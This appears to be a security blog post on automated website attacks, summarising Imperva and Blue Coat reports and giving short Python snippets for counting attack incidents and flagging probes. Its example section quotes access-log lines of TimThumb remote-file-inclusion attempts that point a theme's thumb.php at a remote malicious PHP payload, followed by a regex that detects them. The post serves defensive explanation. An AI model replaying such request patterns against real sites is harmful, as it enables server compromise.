When trying to understand the anatomy of attacks on websites, you have to break them down into manageable parts. In my mind it really comes down to two types: targeted and opportunistic.
More important to understand is how the attack is executed, and that’s what I want to spend some time on in this post.
What do today’s attacks look like?
For most, targeted attacks will be rare, but they do happen every day. You might recall news mentions of the CIA website being defaced, or of LinkedIn and eHarmony being compromised; I'd categorize both of those as targeted attacks. There is also the recent article about the Gizmodo employee who appeared to lose his entire digital identity, simply because the attacker liked his Twitter handle.
On the flip side, you have opportunistic attacks, which are likely what affects most people reading this. I provide a deeper discussion in our post, Understanding Opportunistic Attacks. The good news is that in both instances you find many similarities in the attacks, specifically the use of tools that allow for automation.
Setting the Foundation
To help understand automation we'll make use of a report released in July by Imperva. It's titled Web Application Report, Edition 3 – Released July 2012, and in it they summarize their findings from a 6-month period in which they randomly selected 50 websites and actively monitored attacks against them. Highlights of what they found include:
- Expect attack incidents 120 days per year (33% of the time); some sites experienced as many as 292 days (80%)
- Attacked 274 times per year
- Attack campaigns average 7 minutes 42 seconds, and can range upward from there
- SQL Injection is the most frequent attack
While a sample group of 50 websites is relatively small and likely not very representative of the close to 800,000,000 websites on the interwebs today, it is useful for understanding what I mean when I say automation and, more importantly, for seeing what some of those attacks look for.
When reading their report, it's important to establish a baseline for how their data analysis was conducted and to better understand their presentation methodology.
So to help summarize:
- Their study did not focus on the number of malicious requests; instead it placed emphasis on something they call an attack incident.
- An attack incident in turn can be comprised of multiple malicious requests; this is important to understand.
- An attack incident was defined as an event in which a minimum of 30 requests were made in a 5-minute period (which averages out to 1 request every 10 seconds).
- They then introduced the concept of battle days: days on which, at a minimum, one attack incident occurred.
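To make the incident definition concrete, here is a minimal sketch of how you might flag attack incidents in a stream of request timestamps. This is my own simplified windowing logic, not Imperva's actual methodology, which the report does not spell out at this level of detail:

```python
from datetime import datetime, timedelta

def count_incident_windows(timestamps, min_requests=30, window=timedelta(minutes=5)):
    """Count windows that meet the report's incident threshold:
    at least `min_requests` requests within a `window`-long span.
    `timestamps` must be a sorted list of datetime objects."""
    incidents = 0
    i = 0
    n = len(timestamps)
    while i < n:
        # Expand a window starting at request i
        j = i
        while j < n and timestamps[j] - timestamps[i] <= window:
            j += 1
        if j - i >= min_requests:
            incidents += 1
            i = j  # skip past this window so requests aren't double-counted
        else:
            i += 1
    return incidents
```

Fed with timestamps parsed from an access log, a burst of 30 or more requests inside any 5-minute span would register as one incident under this definition.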
With this understanding we are better prepared to digest the data.
Their summary chart is a good place to start when digesting the report:
Here you can see some very good quantifiable data points that help you better understand what automation really means and, more importantly, what it looks like.
- In the 6-month period, the median number of battle days was 59, while the worst case was 141. Remember that the median is not to be confused with the average; it's the middle value that separates the top half from the bottom half. In other words, 50% of the sites had more than 59 battle days, while the other 50% had fewer. The 141 means that at least one site had 141 battle days.
- In the same group, they had a median of 137 attack incidents with a worst case of 1,383. This does not mean the 1,383 attack incidents correlate with the 141 battle days. What it does tell us is that each of those incidents, whether part of the 137 or the 1,383, contained at least 30 requests within a 5-minute period – conservatively. So in the case of 137 attack incidents you're looking at a minimum of 4,110 requests, and in the case of 1,383, at least 41,490 requests. While grossly underestimated, this helps paint a more complete picture of what the websites experienced over the 6-month period.
- The last thing to pay mind to is the duration of each attack incident. In the chart, we see that the median is 7.70 minutes, while in the worst case they found it to be about 79 minutes. What I can say about this is that in our own experience we have seen attacks last as long as 4 days, which translates roughly to 5,760 minutes.
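The lower-bound arithmetic in the bullets above is just the incident count multiplied by the 30-request minimum that defines an incident. A quick sanity check:

```python
MIN_REQUESTS_PER_INCIDENT = 30  # the report's incident threshold

def minimum_requests(incidents):
    """Conservative floor on total malicious requests, given a count of
    attack incidents that each contain at least 30 requests."""
    return incidents * MIN_REQUESTS_PER_INCIDENT

median_floor = minimum_requests(137)      # median case: 4,110 requests
worst_case_floor = minimum_requests(1383)  # worst case: 41,490 requests
```

Because incidents routinely contain far more than 30 requests, the real totals are much higher; this only establishes the floor.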
I found this all very fascinating. It gave me a much better picture of what automation looks like, specifically how it is employed in today's attacks.
The sheer volume of attacks across the incidents and battle days makes it highly impractical to think this is anything but an automated process. With that assumption in mind, looking at what the attacks were comprised of was another great addition to the report.
In their analysis they summarized the attacks into 8 categories; here I'll focus on the 5 I think impact our readers the most:
- SQL Injection (SQLi)
- Remote File Inclusion (RFI)
- Local File Inclusion (LFI)
- Directory Traversal (DT)
- Cross-Site Scripting (XSS)
From that, this was the distribution of those groups in attack incidents within the sample group:
In each case, here is the summarized duration of those same attacks within the sample group:
Again, this does not mean this is the distribution you can come to expect; rather, it's meant to better illustrate what automated attacks look like and how they target different vulnerabilities.
The first table shows that within the 6-month test period, and restricted to their sample group, the median number of attack incidents was 17.50 for SQL injection attacks, again meaning that 50% were above this figure and 50% below it. This doesn't mean the attacks were successful, just that the attempts were recorded. In that same sample group, the maximum number of attack incidents recorded was 320 for that same category – SQL injection.
The second table then shows you that of all the incidents, the median was 8.39 minutes for SQLi, 7.50 minutes for RFI, 7.83 minutes for LFI, and so on.
The Key is Automation
If you find yourself scratching your head at the above, I apologize and hope to clarify the discussion in this section.
What the data above provides is insight that helps affirm opinions about how attacks work, specifically the automation of attacks. Given the sheer volume of attacks today, automation is the only real explanation for the surge in infections over the past two years.
Automation is key because it offers a number of benefits to the attackers, for instance:
- Allows for mass exposure – reach more sites quickly, versus individually
- Reduces the overhead of following more traditional steps – Reconnaissance, Information Gathering, Strategy, Execution
- Provides tools to the inexperienced
- Increases the odds of success; allows for a high rate of communication between the host and the attacker, in some instances capable of taking down a server or quickly ascertaining a vulnerability before a system is able to respond
That being said, automated attacks still share common traits. They:
- Scan for potential victims
- Compromise the victim using a tool
- Keep control of the environment
In some instances, however, you can expect the scanning and compromise to happen simultaneously, as you see above. In those instances the attacks were automated scans looking to exploit known vulnerabilities in each of those categories.
Here is a real-world example on my own server in which you can see the attack attempting to (1) identify the vulnerability, TimThumb, and if found (2) exploit it by passing a parameter that then referenced the malicious payload:
X.X.X.X - - "GET /%22%20class=%22resultLink/wp-content/themes/groovyvideo/thumb.php?src=http://picasa…alcode.com/andalas.php HTTP/1.1" 404
X.X.X.X - - "GET /wp-content/themes/groovyvideo/thumb.php?src=http://picasa.co…onalcode.com/andalas.php HTTP/1.1" 404
X.X.X.X - - "GET /%22%20class=%22resultLink/wp-content/themes/groovyvideo/thumb.php?src=http://pica…lcode.com/andalas.php HTTP/1.1" 404
X.X.X.X - - "GET /wp-content/themes/groovyvideo/thumb.php?src=http://picas…ionalcode.com/andalas.php HTTP/1.1" 404
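If you wanted to spot probes like the ones above in your own access logs, a simple heuristic is to look for a remote URL being passed in the `src` parameter of `thumb.php`, which is the signature of the TimThumb remote-file-inclusion attempt. This is a minimal sketch of my own, not a substitute for a real WAF or log-analysis tool:

```python
import re

# Heuristic: a remote (http/https) URL in the `src` query parameter of
# thumb.php is the classic TimThumb RFI probe shown in the log lines above.
# The colon may appear literally or URL-encoded as %3A.
RFI_PATTERN = re.compile(r'GET\s+\S*thumb\.php\?src=https?(?::|%3A)', re.IGNORECASE)

def looks_like_timthumb_probe(log_line):
    """Return True if an access-log line matches the TimThumb RFI pattern."""
    return bool(RFI_PATTERN.search(log_line))
```

Run over a log file line by line, this would flag all four requests above; the hostnames in any test data are of course hypothetical.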
While these implementations automate the attacks, they are still managed by an individual or group of individuals. Unfortunately, that is but one component of these attacks.
More sophisticated automation tools are embedded within worms and housed within malware networks (malnets). This was best articulated in Blue Coat’s 2011 Web Security Report, in which they kick off the report by saying:
…malnets (malware networks) emerged as the next evolution in the threat landscape. These infrastructures last beyond any one attack, allowing cybercriminals to quickly adapt to new vulnerabilities and repeatedly launch malware attacks. By exploiting popular places on the Internet, such as search engines, social networking and email, malnets have become very adept at infecting many users with little added investment.
They go on to provide a nice illustration in which they identify the top 5 malnets for the year and, more importantly, provide good information on what each malnet is designed to do and how they scale based on when an attack occurs or when one goes into hibernation.
To help grasp the global reach of these malnets they even provide a nice illustration in which they show how each malnet is geographically dispersed:
Yes, all this can be a bit overwhelming, myself included, but the fact remains that the interwebs is a dangerous place. Attacks today have nothing to do with you as an individual in most cases, and are rarely targeted – and I use "rarely" loosely when you think about those 800 million websites. It's about maximum impact and monetization, or financial gain.
The questions and comments need to change from "Why me?" and "It'd never happen to me!" to "How do I become better prepared and informed about today's threats on the web?"
If you have any questions or comments pertaining to this post you can (1) leave a comment or (2) send us an email at email@example.com.